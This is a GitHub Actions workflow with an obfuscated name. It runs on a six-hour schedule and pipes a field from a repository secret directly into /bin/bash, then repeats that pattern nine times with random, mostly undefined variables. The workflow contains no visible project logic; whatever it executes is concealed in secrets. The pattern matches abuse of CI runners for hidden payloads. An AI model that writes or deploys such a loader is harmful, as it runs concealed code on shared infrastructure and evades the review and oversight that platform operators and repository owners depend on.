name: meilitong3214
on:
  workflow_dispatch:
  schedule:
    - cron: '34 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meilitong3214
        env:
          zw3: ${{ secrets.zw3 }}
        run: |
          echo $zw3 | jq -r .w29646 | /bin/bash
          echo $veph931 | jq -r .cyp23 | /bin/bash
          echo $v8 | jq -r .w81 | /bin/bash
          echo $p3947 | jq -r .the77836 | /bin/bash
          echo $zxadx636 | jq -r .mpu3751 | /bin/bash
          echo $ye33 | jq -r .rs0832 | /bin/bash
          echo $fg6159 | jq -r .lfufe8680 | /bin/bash
          echo $mqzb928 | jq -r .q458 | /bin/bash
          echo $zm93589 | jq -r .iz0031 | /bin/bash
          echo $su73 | jq -r .zcaix702 | /bin/bash

